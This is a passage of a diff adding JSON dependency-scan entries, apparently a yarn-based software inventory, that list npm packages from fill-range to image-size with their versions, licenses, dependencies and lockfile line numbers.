"Identifier": { + "PURL": "pkg:npm/fill-range@7.1.1", + "UID": "1adb158e41c3c0a0" + }, + "Version": "7.1.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "to-regex-range@5.0.1" + ], + "Locations": [ + { + "StartLine": 5302, + "EndLine": 5307 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "filter-obj@1.1.0", + "Name": "filter-obj", + "Identifier": { + "PURL": "pkg:npm/filter-obj@1.1.0", + "UID": "91365b893418d545" + }, + "Version": "1.1.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 5309, + "EndLine": 5312 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "finalhandler@1.1.2", + "Name": "finalhandler", + "Identifier": { + "PURL": "pkg:npm/finalhandler@1.1.2", + "UID": "188da835f35cfca5" + }, + "Version": "1.1.2", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "debug@2.6.9", + "encodeurl@1.0.2", + "escape-html@1.0.3", + "on-finished@2.3.0", + "parseurl@1.3.3", + "statuses@1.5.0", + "unpipe@1.0.0" + ], + "Locations": [ + { + "StartLine": 5314, + "EndLine": 5325 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "find-babel-config@2.1.2", + "Name": "find-babel-config", + "Identifier": { + "PURL": "pkg:npm/find-babel-config@2.1.2", + "UID": "56920d6726da074a" + }, + "Version": "2.1.2", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "json5@2.2.3" + ], + "Locations": [ + { + "StartLine": 5327, + "EndLine": 5332 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "find-up@3.0.0", + "Name": "find-up", + "Identifier": { + "PURL": "pkg:npm/find-up@3.0.0", + "UID": "a63f9c82b1b2dfd8" + }, + "Version": "3.0.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "locate-path@3.0.0" + ], + "Locations": [ + { + "StartLine": 5334, + "EndLine": 5339 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "find-up@4.1.0", + "Name": "find-up", + "Identifier": { + "PURL": "pkg:npm/find-up@4.1.0", + "UID": "a0a8e5779e81984d" + }, + "Version": "4.1.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "locate-path@5.0.0", + "path-exists@4.0.0" + ], + "Locations": [ + { + "StartLine": 5349, + "EndLine": 5355 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "find-up@5.0.0", + "Name": "find-up", + "Identifier": { + "PURL": "pkg:npm/find-up@5.0.0", + "UID": "b6b57071d4408c9d" + }, + "Version": "5.0.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "locate-path@6.0.0", + "path-exists@4.0.0" + ], + "Locations": [ + { + "StartLine": 5357, + "EndLine": 5363 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "firebase@12.2.1", + "Name": "firebase", + "Identifier": { + "PURL": "pkg:npm/firebase@12.2.1", + "UID": "26035587ab3a05d0" + }, + "Version": "12.2.1", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@firebase/ai@2.2.1", + "@firebase/analytics@0.10.18", + "@firebase/analytics-compat@0.2.24", + "@firebase/app@0.14.2", + "@firebase/app-check@0.11.0", + "@firebase/app-check-compat@0.4.0", + "@firebase/app-compat@0.5.2", + "@firebase/app-types@0.9.3", + "@firebase/auth@1.11.0", + "@firebase/auth-compat@0.6.0", + "@firebase/data-connect@0.3.11", + "@firebase/database@1.1.0", + "@firebase/database-compat@2.1.0", + "@firebase/firestore@4.9.1", + "@firebase/firestore-compat@0.4.1", + "@firebase/functions@0.13.1", + "@firebase/functions-compat@0.4.1", + "@firebase/installations@0.6.19", + "@firebase/installations-compat@0.2.19", + "@firebase/messaging@0.12.23", + "@firebase/messaging-compat@0.2.23", + "@firebase/performance@0.7.9", + "@firebase/performance-compat@0.2.22", + "@firebase/remote-config@0.6.6", + "@firebase/remote-config-compat@0.2.19", + "@firebase/storage@0.14.0", + "@firebase/storage-compat@0.4.0", + "@firebase/util@1.13.0" + ], + "Locations": [ + { + "StartLine": 5372, + "EndLine": 5404 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "flow-enums-runtime@0.0.6", + "Name": "flow-enums-runtime", + "Identifier": { + "PURL": "pkg:npm/flow-enums-runtime@0.0.6", + "UID": "490d85c178a89a03" + }, + "Version": "0.0.6", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 5420, + "EndLine": 5423 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "follow-redirects@1.15.11", + "Name": "follow-redirects", + "Identifier": { + "PURL": "pkg:npm/follow-redirects@1.15.11", + "UID": "6524ae70e09c9077" + }, + "Version": "1.15.11", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 5425, + "EndLine": 5428 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "for-each@0.3.5", + "Name": "for-each", + "Identifier": { + "PURL": "pkg:npm/for-each@0.3.5", + "UID": "fa2cacb4eb77ba77" + }, + "Version": "0.3.5", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "is-callable@1.2.7" + ], + "Locations": [ + { + "StartLine": 5430, + "EndLine": 5435 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "foreground-child@3.3.1", + "Name": "foreground-child", + "Identifier": { + "PURL": "pkg:npm/foreground-child@3.3.1", + "UID": "1ccf7634108d4ce9" + }, + "Version": "3.3.1", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "cross-spawn@7.0.6", + "signal-exit@4.1.0" + ], + "Locations": [ + { + "StartLine": 5437, + "EndLine": 5443 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "form-data@4.0.4", + "Name": "form-data", + "Identifier": { + "PURL": "pkg:npm/form-data@4.0.4", + "UID": "73f0e3b5dc2a3f61" + }, + "Version": "4.0.4", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "asynckit@0.4.0", + "combined-stream@1.0.8", + "es-set-tostringtag@2.1.0", + "hasown@2.0.2", + "mime-types@2.1.35" + ], + "Locations": [ + { + "StartLine": 5445, + "EndLine": 5454 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "fresh@0.5.2", + "Name": "fresh", + "Identifier": { + "PURL": "pkg:npm/fresh@0.5.2", + "UID": "42ed98dc0f0909e6" + }, + "Version": "0.5.2", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 5456, + "EndLine": 5459 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "fs-constants@1.0.0", + "Name": "fs-constants", + "Identifier": { + "PURL": "pkg:npm/fs-constants@1.0.0", + "UID": "57be96fd06323205" + }, + "Version": "1.0.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 5461, + "EndLine": 5464 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "fs-extra@11.3.2", + "Name": "fs-extra", + "Identifier": { + "PURL": "pkg:npm/fs-extra@11.3.2", + "UID": "85726961a12c9c9e" + }, + "Version": "11.3.2", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "graceful-fs@4.2.11", + "jsonfile@6.2.0", + "universalify@2.0.1" + ], + "Locations": [ + { + "StartLine": 5475, + "EndLine": 5482 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "fs-extra@7.0.1", + "Name": "fs-extra", + "Identifier": { + "PURL": "pkg:npm/fs-extra@7.0.1", + "UID": "abc4202c8249d0bf" + }, + "Version": "7.0.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "graceful-fs@4.2.11", + "jsonfile@4.0.0", + "universalify@0.1.2" + ], + "Locations": [ + { + "StartLine": 5484, + "EndLine": 5491 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "fs-minipass@3.0.3", + "Name": "fs-minipass", + "Identifier": { + "PURL": "pkg:npm/fs-minipass@3.0.3", + "UID": "3534b157e6b64de6" + }, + "Version": "3.0.3", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "minipass@7.1.2" + ], + "Locations": [ + { + "StartLine": 5509, + "EndLine": 5514 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "fs.realpath@1.0.0", + "Name": "fs.realpath", + "Identifier": { + "PURL": "pkg:npm/fs.realpath@1.0.0", + "UID": "168ccea30b48cec0" + }, + "Version": "1.0.0", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 5516, + "EndLine": 5519 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "function-bind@1.1.2", + "Name": "function-bind", + "Identifier": { + "PURL": "pkg:npm/function-bind@1.1.2", + "UID": "13eaeb5cfe568b7c" + }, + "Version": "1.1.2", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 5521, + "EndLine": 5524 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "gauge@2.7.4", + "Name": "gauge", + "Identifier": { + "PURL": "pkg:npm/gauge@2.7.4", + "UID": "3f27808838b313a" + }, + "Version": "2.7.4", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "aproba@1.2.0", + "console-control-strings@1.1.0", + "has-unicode@2.0.1", + "object-assign@4.1.1", + "signal-exit@3.0.7", + "string-width@1.0.2", + "strip-ansi@3.0.1", + "wide-align@1.1.5" + ], + "Locations": [ + { + "StartLine": 5557, + "EndLine": 5569 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "generator-function@2.0.1", + "Name": "generator-function", + "Identifier": { + "PURL": "pkg:npm/generator-function@2.0.1", + "UID": "746e7b129e53da85" + }, + "Version": "2.0.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 5571, + "EndLine": 5574 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "gensync@1.0.0-beta.2", + "Name": "gensync", + "Identifier": { + "PURL": "pkg:npm/gensync@1.0.0-beta.2", + "UID": "f48fc1368ce52a90" + }, + "Version": "1.0.0-beta.2", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 5576, + "EndLine": 5579 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "get-caller-file@2.0.5", + "Name": "get-caller-file", + "Identifier": { + "PURL": "pkg:npm/get-caller-file@2.0.5", + "UID": "5f690116fda1d531" + }, + "Version": "2.0.5", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 5581, + "EndLine": 5584 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "get-intrinsic@1.3.0", + "Name": "get-intrinsic", + "Identifier": { + "PURL": "pkg:npm/get-intrinsic@1.3.0", + "UID": "6a52e5a5c5c7df14" + }, + "Version": "1.3.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "call-bind-apply-helpers@1.0.2", + "es-define-property@1.0.1", + "es-errors@1.3.0", + "es-object-atoms@1.1.1", + "function-bind@1.1.2", + "get-proto@1.0.1", + "gopd@1.2.0", + "has-symbols@1.1.0", + "hasown@2.0.2", + "math-intrinsics@1.1.0" + ], + "Locations": [ + { + "StartLine": 5586, + "EndLine": 5600 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "get-package-type@0.1.0", + "Name": "get-package-type", + "Identifier": { + "PURL": "pkg:npm/get-package-type@0.1.0", + "UID": "3eaa9734e63bbda" + }, + "Version": "0.1.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 5602, + "EndLine": 5605 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "get-proto@1.0.1", + "Name": "get-proto", + "Identifier": { + "PURL": "pkg:npm/get-proto@1.0.1", + "UID": "d6765cbb92aa2fb4" + }, + "Version": "1.0.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "dunder-proto@1.0.1", + "es-object-atoms@1.1.1" + ], + "Locations": [ + { + "StartLine": 5607, + "EndLine": 5613 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "get-stream@6.0.1", + "Name": "get-stream", + "Identifier": { + "PURL": "pkg:npm/get-stream@6.0.1", + "UID": "ca2ca983c1c56626" + }, + "Version": "6.0.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 5615, + "EndLine": 5618 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "getenv@2.0.0", + "Name": "getenv", + "Identifier": { + "PURL": "pkg:npm/getenv@2.0.0", + "UID": "abff5984eabcd8ac" + }, + "Version": "2.0.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 5629, + "EndLine": 5632 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "github-from-package@0.0.0", + "Name": "github-from-package", + "Identifier": { + "PURL": "pkg:npm/github-from-package@0.0.0", + "UID": "9066dcfa2d19fc35" + }, + "Version": "0.0.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 5634, + "EndLine": 5637 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "glob@10.4.5", + "Name": "glob", + "Identifier": { + "PURL": "pkg:npm/glob@10.4.5", + "UID": "aa8173cd075f0cb0" + }, + "Version": "10.4.5", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "foreground-child@3.3.1", + "jackspeak@3.4.3", + "minimatch@9.0.5", + "minipass@7.1.2", + "package-json-from-dist@1.0.1", + "path-scurry@1.11.1" + ], + "Locations": [ + { + "StartLine": 5675, + "EndLine": 5685 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "glob@11.0.3", + "Name": "glob", + "Identifier": { + "PURL": "pkg:npm/glob@11.0.3", + "UID": "3a0538ce88725972" + }, + "Version": "11.0.3", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "foreground-child@3.3.1", + "jackspeak@4.1.1", + "minimatch@10.0.3", + "minipass@7.1.2", + "package-json-from-dist@1.0.1", + "path-scurry@2.0.0" + ], + "Locations": [ + { + "StartLine": 5687, + "EndLine": 5695 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "glob@7.2.3", + "Name": "glob", + "Identifier": { + "PURL": "pkg:npm/glob@7.2.3", + "UID": "75ecb3389b997f94" + }, + "Version": "7.2.3", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "fs.realpath@1.0.0", + "inflight@1.0.6", + "inherits@2.0.4", + "minimatch@3.1.2", + "once@1.4.0", + "path-is-absolute@1.0.1" + ], + "Locations": [ + { + "StartLine": 5697, + "EndLine": 5707 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "glob@9.3.5", + "Name": "glob", + "Identifier": { + "PURL": "pkg:npm/glob@9.3.5", + "UID": "270808f088f24fa4" + }, + "Version": "9.3.5", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "fs.realpath@1.0.0", + "minimatch@8.0.7", + "minipass@4.2.8", + "path-scurry@1.11.1" + ], + "Locations": [ + { + "StartLine": 5709, + "EndLine": 5717 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "glob-parent@5.1.2", + "Name": "glob-parent", + "Identifier": { + "PURL": "pkg:npm/glob-parent@5.1.2", + "UID": "9f49ab769ff5ada7" + }, + "Version": "5.1.2", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "is-glob@4.0.3" + ], + "Locations": [ + { + "StartLine": 5639, + "EndLine": 5644 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "gopd@1.2.0", + "Name": "gopd", + "Identifier": { + "PURL": "pkg:npm/gopd@1.2.0", + "UID": "7bd7b99e233d345" + }, + "Version": "1.2.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 5746, + "EndLine": 5749 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "graceful-fs@4.2.11", + "Name": "graceful-fs", + "Identifier": { + "PURL": "pkg:npm/graceful-fs@4.2.11", + "UID": "e31cc83e64daa68f" + }, + "Version": "4.2.11", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 5751, + "EndLine": 5754 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "hard-rejection@2.1.0", + "Name": "hard-rejection", + "Identifier": { + "PURL": "pkg:npm/hard-rejection@2.1.0", + "UID": "ca8fa1b6d0002b34" + }, + "Version": "2.1.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 5761, + "EndLine": 5764 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "has-flag@3.0.0", + "Name": "has-flag", + "Identifier": { + "PURL": "pkg:npm/has-flag@3.0.0", + "UID": "6c0a3047f6ed4c6e" + }, + "Version": "3.0.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 5771, + "EndLine": 5774 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "has-flag@4.0.0", + "Name": "has-flag", + "Identifier": { + "PURL": "pkg:npm/has-flag@4.0.0", + "UID": "b9a4cc1feb7a434c" + }, + "Version": "4.0.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 5776, + "EndLine": 5779 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "has-property-descriptors@1.0.2", + "Name": "has-property-descriptors", + "Identifier": { + "PURL": "pkg:npm/has-property-descriptors@1.0.2", + "UID": "d8c8acbddaabf6d7" + }, + "Version": "1.0.2", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "es-define-property@1.0.1" + ], + "Locations": [ + { + "StartLine": 5781, + "EndLine": 5786 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "has-symbols@1.1.0", + "Name": "has-symbols", + "Identifier": { + "PURL": "pkg:npm/has-symbols@1.1.0", + "UID": "52610d339152531b" + }, + "Version": "1.1.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 5795, + "EndLine": 5798 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "has-tostringtag@1.0.2", + "Name": "has-tostringtag", + "Identifier": { + "PURL": "pkg:npm/has-tostringtag@1.0.2", + "UID": "991703b81668a744" + }, + "Version": "1.0.2", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "has-symbols@1.1.0" + ], + "Locations": [ + { + "StartLine": 5800, + "EndLine": 5805 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "has-unicode@2.0.1", + "Name": "has-unicode", + "Identifier": { + "PURL": "pkg:npm/has-unicode@2.0.1", + "UID": "9b33c524805d53a6" + }, + "Version": "2.0.1", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 5807, + "EndLine": 5810 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "hasown@2.0.2", + "Name": "hasown", + "Identifier": { + "PURL": "pkg:npm/hasown@2.0.2", + "UID": "e6cf7cab916cb357" + }, + "Version": "2.0.2", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "function-bind@1.1.2" + ], + "Locations": [ + { + "StartLine": 5812, + "EndLine": 5817 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "he@1.2.0", + "Name": "he", + "Identifier": { + "PURL": "pkg:npm/he@1.2.0", + "UID": "be5dbe9b48e79006" + }, + "Version": "1.2.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 5819, + "EndLine": 5822 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "hermes-estree@0.29.1", + "Name": "hermes-estree", + "Identifier": { + "PURL": "pkg:npm/hermes-estree@0.29.1", + "UID": "d891375f99882bc" + }, + "Version": "0.29.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 5824, + "EndLine": 5827 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "hermes-estree@0.32.0", + "Name": "hermes-estree", + "Identifier": { + "PURL": "pkg:npm/hermes-estree@0.32.0", + "UID": "f7d36e2cf29ae081" + }, + "Version": "0.32.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 5829, + "EndLine": 5832 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "hermes-parser@0.29.1", + "Name": "hermes-parser", + "Identifier": { + "PURL": "pkg:npm/hermes-parser@0.29.1", + "UID": "ab186d03ec90d44e" + }, + "Version": "0.29.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "hermes-estree@0.29.1" + ], + "Locations": [ + { + "StartLine": 5834, + "EndLine": 5839 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "hermes-parser@0.32.0", + "Name": "hermes-parser", + "Identifier": { + "PURL": "pkg:npm/hermes-parser@0.32.0", + "UID": "87d75be6d36f105d" + }, + "Version": "0.32.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "hermes-estree@0.32.0" + ], + "Locations": [ + { + "StartLine": 5841, + "EndLine": 5846 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "hoist-non-react-statics@3.3.2", + "Name": "hoist-non-react-statics", + "Identifier": { + "PURL": "pkg:npm/hoist-non-react-statics@3.3.2", + "UID": "5a7a258a60a464b9" + }, + "Version": "3.3.2", + "Licenses": [ + "BSD-3-Clause" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "react-is@16.13.1" + ], + "Locations": [ + { + "StartLine": 5848, + "EndLine": 5853 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "hosted-git-info@2.8.9", + "Name": "hosted-git-info", + "Identifier": { + "PURL": "pkg:npm/hosted-git-info@2.8.9", + "UID": "11a85829f5cf60d5" + }, + "Version": "2.8.9", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 5855, + "EndLine": 5858 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "hosted-git-info@4.1.0", + "Name": "hosted-git-info", + "Identifier": { + "PURL": "pkg:npm/hosted-git-info@4.1.0", + "UID": "f4c56e36dd71866a" + }, + "Version": "4.1.0", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "lru-cache@6.0.0" + ], + "Locations": [ + { + "StartLine": 5860, + "EndLine": 5865 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "hosted-git-info@9.0.2", + "Name": "hosted-git-info", + "Identifier": { + "PURL": "pkg:npm/hosted-git-info@9.0.2", + "UID": "d8ab437625cce3ad" + }, + "Version": "9.0.2", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "lru-cache@11.2.2" + ], + "Locations": [ + { + "StartLine": 5867, + "EndLine": 5872 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "html2canvas@1.4.1", + "Name": "html2canvas", + "Identifier": { + "PURL": "pkg:npm/html2canvas@1.4.1", + "UID": "db4fc16c20e079b7" + }, + "Version": "1.4.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "css-line-break@2.1.0", + "text-segmentation@1.0.3" + ], + "Locations": [ + { + "StartLine": 5879, + "EndLine": 5885 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "http-cache-semantics@4.2.0", + "Name": "http-cache-semantics", + "Identifier": { + "PURL": "pkg:npm/http-cache-semantics@4.2.0", + "UID": "bada92707945977c" + }, + "Version": "4.2.0", + "Licenses": [ + "BSD-2-Clause" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 5892, + "EndLine": 5895 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "http-errors@2.0.0", + "Name": "http-errors", + "Identifier": { + "PURL": "pkg:npm/http-errors@2.0.0", + "UID": "31cf8c58bed3ba1d" + }, + "Version": "2.0.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "depd@2.0.0", + "inherits@2.0.4", + "setprototypeof@1.2.0", + "statuses@2.0.1", + "toidentifier@1.0.1" + ], + "Locations": [ + { + "StartLine": 5897, + "EndLine": 5906 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "http-parser-js@0.5.10", + "Name": "http-parser-js", + "Identifier": { + "PURL": "pkg:npm/http-parser-js@0.5.10", + "UID": "73b8dc2f2700d9b4" + }, + "Version": "0.5.10", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 5908, + "EndLine": 5911 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "http-proxy-agent@7.0.2", + "Name": "http-proxy-agent", + "Identifier": { + "PURL": "pkg:npm/http-proxy-agent@7.0.2", + "UID": "9b9d2f2c7d3db354" + }, + "Version": "7.0.2", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "agent-base@7.1.4", + "debug@4.4.3" + ], + "Locations": [ + { + "StartLine": 5922, + "EndLine": 5928 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "https-proxy-agent@7.0.6", + "Name": "https-proxy-agent", + "Identifier": { + "PURL": "pkg:npm/https-proxy-agent@7.0.6", + "UID": "1aec7d3259366a67" + }, + "Version": "7.0.6", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "agent-base@7.1.4", + "debug@4.4.3" + ], + "Locations": [ + { + "StartLine": 5946, + "EndLine": 5952 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "human-signals@2.1.0", + "Name": "human-signals", + "Identifier": { + "PURL": "pkg:npm/human-signals@2.1.0", + "UID": "1c11515275c796b5" + }, + "Version": "2.1.0", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 5954, + "EndLine": 5957 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "iconv-lite@0.6.3", + "Name": "iconv-lite", + "Identifier": { + "PURL": "pkg:npm/iconv-lite@0.6.3", + "UID": "19c5df22ddcd6154" + }, + "Version": "0.6.3", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "safer-buffer@2.1.2" + ], + "Locations": [ + { + "StartLine": 5966, + "EndLine": 5971 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "idb@7.1.1", + "Name": "idb", + "Identifier": { + "PURL": "pkg:npm/idb@7.1.1", + "UID": "362630b7e5a8c251" + }, + "Version": "7.1.1", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 5980, + "EndLine": 5983 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "ieee754@1.2.1", + "Name": "ieee754", + "Identifier": { + "PURL": "pkg:npm/ieee754@1.2.1", + "UID": "ec620e92b7f4a4de" + }, + "Version": "1.2.1", + "Licenses": [ + "BSD-3-Clause" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 5985, + "EndLine": 5988 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "ignore-walk@8.0.0", + "Name": "ignore-walk", + "Identifier": { + "PURL": "pkg:npm/ignore-walk@8.0.0", + "UID": "e7b5a23519200178" + }, + "Version": "8.0.0", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "minimatch@10.0.3" + ], + "Locations": [ + { + "StartLine": 5990, + "EndLine": 5995 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "image-size@1.2.1", + "Name": "image-size", + "Identifier": { + "PURL": "pkg:npm/image-size@1.2.1", + "UID": "2d445d5a2016a8e4" + }, + "Version": "1.2.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "queue@6.0.2" + ], + "Locations": [ + { + "StartLine": 6002, + "EndLine": 6007 + } + ], + "AnalyzedBy": "yarn" + 